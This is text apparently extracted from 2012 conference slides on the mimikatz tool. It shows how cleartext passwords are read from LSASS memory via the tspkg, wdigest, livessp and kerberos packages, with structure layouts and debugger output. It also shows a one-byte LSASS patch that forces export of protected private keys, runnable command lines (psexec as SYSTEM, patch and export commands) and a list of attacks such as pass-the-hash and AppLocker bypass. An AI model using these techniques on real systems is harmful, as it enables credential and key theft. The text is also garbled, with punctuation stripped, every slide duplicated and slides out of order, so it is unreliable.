ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
